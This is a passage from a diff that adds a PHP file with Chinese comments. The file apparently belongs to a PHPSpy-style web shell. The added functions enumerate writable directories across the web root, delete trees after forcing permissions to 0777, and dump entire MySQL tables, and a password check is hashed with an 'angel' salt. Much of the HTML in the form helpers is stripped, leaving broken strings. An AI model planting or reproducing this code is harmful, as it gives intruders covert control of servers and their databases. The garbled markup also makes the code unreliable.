't' : 'T';} + + return $type.$owner['read'].$owner['write'].$owner['execute'].$group['read'].$group['write'].$group['execute'].$world['read'].$world['write'].$world['execute']; +} + +function getUser($file) { + if (function_exists('posix_getpwuid')) { + $array = @posix_getpwuid(@fileowner($file)); + if ($array && is_array($array)) { + return ' / '.$array['name'].''; + } + } + return ''; +} + +function copy_paste($c,$f,$d){ + if(is_dir($c.$f)){ + mkdir($d.$f); + $dirs = scandir($c.$f); + if ($dirs) { + $dirs = array_diff($dirs, array('..', '.')); + foreach ($dirs as $file) { + copy_paste($c.$f.'/',$file, $d.$f.'/'); + } + } + } elseif(is_file($c.$f)) { + copy($c.$f, $d.$f); + } +} +// 删除目录 +function deltree($deldir) { + $dirs = @scandir($deldir); + if ($dirs) { + $dirs = array_diff($dirs, array('..', '.')); + foreach ($dirs as $file) { + if((is_dir($deldir.'/'.$file))) { + @chmod($deldir.'/'.$file,0777); + deltree($deldir.'/'.$file); + } else { + @chmod($deldir.'/'.$file,0777); + @unlink($deldir.'/'.$file); + } + } + @chmod($deldir,0777); + return @rmdir($deldir) ? 1 : 0; + } else { + return 0; + } +} + +// 表格行间的背景色替换 +function bg() { + global $bgc; + return ($bgc++%2==0) ? 'alt1' : 'alt2'; +} + +function cmp($a, $b) { + global $sort; + if(is_numeric($a[$sort[0]])) { + return (($a[$sort[0]] < $b[$sort[0]]) ? 
-1 : 1)*($sort[1]?1:-1); + } else { + return strcmp($a[$sort[0]], $b[$sort[0]])*($sort[1]?1:-1); + } +} + +// 获取当前目录的上级目录 +function getUpPath($cwd) { + $pathdb = explode('/', $cwd); + $num = count($pathdb); + if ($num > 2) { + unset($pathdb[$num-1],$pathdb[$num-2]); + } + $uppath = implode('/', $pathdb).'/'; + $uppath = str_replace('//', '/', $uppath); + return $uppath; +} + +// 检查PHP配置参数 +function getcfg($varname) { + $result = get_cfg_var($varname); + if ($result == 0) { + return 'No'; + } elseif ($result == 1) { + return 'Yes'; + } else { + return $result; + } +} + +// 获得文件扩展名 +function getext($file) { + $info = pathinfo($file); + return $info['extension']; +} +function GetWDirList($path){ + global $dirdata,$j,$web_cwd; + !$j && $j=1; + $dirs = @scandir($path); + if ($dirs) { + $dirs = array_diff($dirs, array('..','.')); + foreach ($dirs as $file) { + $f=str_replace('//','/',$path.'/'.$file); + if(is_dir($f)){ + if (is_writable($f)) { + $dirdata[$j]['filename']='/'.str_replace($web_cwd,'',$f); + $dirdata[$j]['mtime']=@date('Y-m-d H:i:s',filemtime($f)); + $dirdata[$j]['chmod']=getChmod($f); + $dirdata[$j]['perm']=PermsColor($f); + $dirdata[$j]['owner']=getUser($f); + $dirdata[$j]['link']=$f; + $j++; + } + GetWDirList($f); + } + } + return $dirdata; + } else { + return array(); + } +} +function sizecount($size) { + $unit = array('Bytes', 'KB', 'MB', 'GB', 'TB','PB'); + for ($i = 0; $size >= 1024 && $i < 5; $i++) { + $size /= 1024; + } + return round($size, 2).' '.$unit[$i]; +} +function p($str){ + echo $str."\n"; +} + +function makehide($name,$value=''){ + p(""); +} + +function makeinput($arg = array()){ + $arg['size'] = isset($arg['size']) && $arg['size'] > 0 ? "size=\"$arg[size]\"" : "size=\"100\""; + $arg['type'] = isset($arg['type']) ? $arg['type'] : 'text'; + $arg['title'] = isset($arg['title']) ? $arg['title'].'
' : ''; + $arg['class'] = isset($arg['class']) ? $arg['class'] : 'input'; + $arg['name'] = isset($arg['name']) ? $arg['name'] : ''; + $arg['value'] = isset($arg['value']) ? $arg['value'] : ''; + if (isset($arg['newline'])) p('

'); + p("$arg[title]"); + if (isset($arg['newline'])) p('

');
+}
+
+function makeselect($arg = array()){
+ $onchange = isset($arg['onchange']) ? 'onchange="'.$arg['onchange'].'"' : '';
+ $arg['title'] = isset($arg['title']) ? $arg['title'] : '';
+ $arg['name'] = isset($arg['name']) ? $arg['name'] : '';
+ p("$arg[title] ");
+}
+function formhead($arg = array()) {
+ !isset($arg['method']) && $arg['method'] = 'post';
+ !isset($arg['name']) && $arg['name'] = 'form1';
+ $arg['extra'] = isset($arg['extra']) ? $arg['extra'] : '';
+ $arg['onsubmit'] = isset($arg['onsubmit']) ? "onsubmit=\"$arg[onsubmit]\"" : '';
+ p("
");
+ if (isset($arg['title'])) {
+ p('

'.$arg['title'].' »

');
+ }
+}
+
+function maketext($arg = array()){
+ $arg['title'] = isset($arg['title']) ? $arg['title'].'
' : '';
+ $arg['name'] = isset($arg['name']) ? $arg['name'] : '';
+ p("

$arg[title]

");
+}
+
+function formfooter($name = ''){
+ !$name && $name = 'submit';
+ p('

');
+ p('
');
+}
+
+function goback(){
+ global $cwd, $charset;
+ p('

');
+}
+
+function formfoot(){
+ p('');
+}
+
+function encode_pass($pass) {
+ $k = 'angel';
+ $pass = md5($k.$pass);
+ $pass = md5($pass.$k);
+ $pass = md5($k.$pass.$k);
+ return $pass;
+}
+
+function pr($a) {
+ p('
'.print_r($a).'
');
+}
+
+class DB_MySQL {
+
+ var $querycount = 0;
+ var $link;
+ var $charsetdb = array();
+ var $charset = '';
+
+ function connect($dbhost, $dbuser, $dbpass, $dbname='') {
+ @ini_set('mysql.connect_timeout', 5);
+ if(!$this->link = @mysql_connect($dbhost, $dbuser, $dbpass, 1)) {
+ $this->halt('Can not connect to MySQL server');
+ }
+ if($this->version() > '4.1') {
+ $this->setcharset($this->charset);
+ }
+ $dbname && mysql_select_db($dbname, $this->link);
+ }
+ function setcharset($charset) {
+ if ($charset && $this->charsetdb[$charset]) {
+ if(function_exists('mysql_set_charset')) {
+ mysql_set_charset($this->charsetdb[$charset], $this->link);
+ } else {
+ $this->query("SET character_set_connection='".$this->charsetdb[$charset]."', character_set_results='".$this->charsetdb[$charset]."', character_set_client=binary");
+ }
+ }
+ }
+ function select_db($dbname) {
+ return mysql_select_db($dbname, $this->link);
+ }
+ function geterrdesc() {
+ return (($this->link) ? mysql_error($this->link) : mysql_error());
+ }
+ function geterrno() {
+ return intval(($this->link) ? mysql_errno($this->link) : mysql_errno());
+ }
+ function fetch($query, $result_type = MYSQL_ASSOC) { //MYSQL_NUM
+ return mysql_fetch_array($query, $result_type);
+ }
+ function query($sql) {
+ //echo '

'.$sql.'

';
+ if(!($query = mysql_query($sql, $this->link))) {
+ $this->halt('MySQL Query Error', $sql);
+ }
+ $this->querycount++;
+ return $query;
+ }
+ function query_res($sql) {
+ $res = '';
+ if(!$res = mysql_query($sql, $this->link)) {
+ $res = 0;
+ } else if(is_resource($res)) {
+ $res = 1;
+ } else {
+ $res = 2;
+ }
+ $this->querycount++;
+ return $res;
+ }
+ function num_rows($query) {
+ $query = mysql_num_rows($query);
+ return $query;
+ }
+ function num_fields($query) {
+ $query = mysql_num_fields($query);
+ return $query;
+ }
+ function affected_rows() {
+ return mysql_affected_rows($this->link);
+ }
+ function result($query, $row) {
+ $query = mysql_result($query, $row);
+ return $query;
+ }
+ function free_result($query) {
+ $query = mysql_free_result($query);
+ return $query;
+ }
+ function version() {
+ return mysql_get_server_info($this->link);
+ }
+ function close() {
+ return mysql_close($this->link);
+ }
+ function halt($msg =''){
+ echo "

".htmlspecialchars($msg)."

\n";
+ echo "

Mysql error description: ".htmlspecialchars($this->geterrdesc())."

\n";
+ echo "

Mysql error number: ".$this->geterrno()."

\n";
+ exit;
+ }
+ function get_fields_meta($result) {
+ $fields = array();
+ $num_fields = $this->num_fields($result);
+ for ($i = 0; $i < $num_fields; $i++) {
+ $field = mysql_fetch_field($result, $i);
+ $fields[] = $field;
+ }
+ return $fields;
+ }
+ function sqlAddSlashes($s = ''){
+ $s = str_replace('\\', '\\\\', $s);
+ $s = str_replace('\'', '\'\'', $s);
+ return $s;
+ }
+ // 备份数据库
+ function sqldump($table, $fp=0) {
+ $crlf = (IS_WIN ? "\r\n" : "\n");
+ $search = array("\x00", "\x0a", "\x0d", "\x1a"); //\x08\\x09, not required
+ $replace = array('\0', '\n', '\r', '\Z');
+
+ if (isset($this->charset) && isset($this->charsetdb[$this->charset])) {
+ $set_names = $this->charsetdb[$this->charset];
+ } else {
+ $set_names = $this->charsetdb['utf-8'];
+ }
+ $tabledump = 'SET SQL_MODE="NO_AUTO_VALUE_ON_ZERO";'.$crlf.$crlf;
+ $tabledump .= '/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;'.$crlf
+ . '/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;'.$crlf
+ . '/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;'.$crlf
+ . '/*!40101 SET NAMES ' . $set_names . 
' */;'.$crlf.$crlf;
+
+ $tabledump .= "DROP TABLE IF EXISTS `$table`;".$crlf;
+ $res = $this->query("SHOW CREATE TABLE $table");
+ $create = $this->fetch($res, MYSQL_NUM);
+ $tabledump .= $create[1].';'.$crlf.$crlf;
+ if (strpos($tabledump, "(\r\n ")) {
+ $tabledump = str_replace("\r\n", $crlf, $tabledump);
+ } elseif (strpos($tabledump, "(\n ")) {
+ $tabledump = str_replace("\n", $crlf, $tabledump);
+ } elseif (strpos($tabledump, "(\r ")) {
+ $tabledump = str_replace("\r", $crlf, $tabledump);
+ }
+ unset($create);
+
+ if ($fp) {
+ fwrite($fp,$tabledump);
+ } else {
+ echo $tabledump;
+ }
+ $tabledump = '';
+ $rows = $this->query("SELECT * FROM $table");
+ $fields_cnt = $this->num_fields($rows);
+ $fields_meta = $this->get_fields_meta($rows);
+
+ while ($row = $this->fetch($rows, MYSQL_NUM)) {
+ for ($j = 0; $j < $fields_cnt; $j++) {
+ if (!isset($row[$j]) || is_null($row[$j])) {
+ $values[] = 'NULL';
+ } elseif ($fields_meta[$j]->numeric && $fields_meta[$j]->type != 'timestamp' && !$fields_meta[$j]->blob) {
+ $values[] = $row[$j];
+ } elseif ($fields_meta[$j]->blob) {
+ if (empty($row[$j]) && $row[$j] != '0') {
+ $values[] = '\'\'';
+ } else {
+ $values[] = '0x'.bin2hex($row[$j]);
+ }
+ } else {
+ $values[] = '\''.str_replace($search, $replace, $this->sqlAddSlashes($row[$j])).'\'';
+ }
+ }
+ $tabledump = 'INSERT INTO `'.$table.'` VALUES('.implode(', ', $values).');'.$crlf;
+ unset($values);
+ if ($fp) {
+ fwrite($fp,$tabledump);
+ } else {
+ echo $tabledump;
+ }
+ }
+ $this->free_result($rows);
+ }
+}
+?>
\ No newline at end of file